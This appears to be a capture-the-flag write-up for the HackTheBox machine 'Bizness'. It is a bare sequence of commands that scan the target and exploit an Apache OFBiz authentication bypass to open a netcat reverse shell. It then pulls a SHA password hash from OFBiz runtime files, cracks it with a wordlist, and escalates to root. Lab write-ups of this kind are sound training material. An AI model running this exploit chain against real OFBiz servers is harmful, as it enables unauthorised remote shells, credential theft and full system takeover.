HackTheBox Bizness Writeup

10.10.11.252 bizness.htb

ip="10.10.11.252"
domain="bizness.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

nmap -sCV bizness.htb

Nmap scan report for bizness.htb (10.10.11.252)
Host is up (0.051s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp  open  http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp open  ssl/http nginx 1.18.0
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg: 
|_  http/1.1
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

dirb 'https://bizness.htb/'

nc -lvnp 9001

git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
cd Apache-OFBiz-Authentication-Bypass
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python exploit.py --url 'https://bizness.htb' --cmd "nc -c /bin/sh $vpnip 9001"

python3 -c 'import pty;pty.spawn("/bin/bash")'

stty size; stty raw -echo; fg

export TERM=xterm;

cat /home/ofbiz/user.txt

grep --binary-files=text -rni 'currentpassword' /opt/ofbiz/runtime

git clone https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker
cd Apache-OFBiz-SHA1-Cracker
python OFBiz-crack.py --hash-string '$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I' --wordlist '/usr/share/dict/rockyou.txt'

su
cat /root/root.txt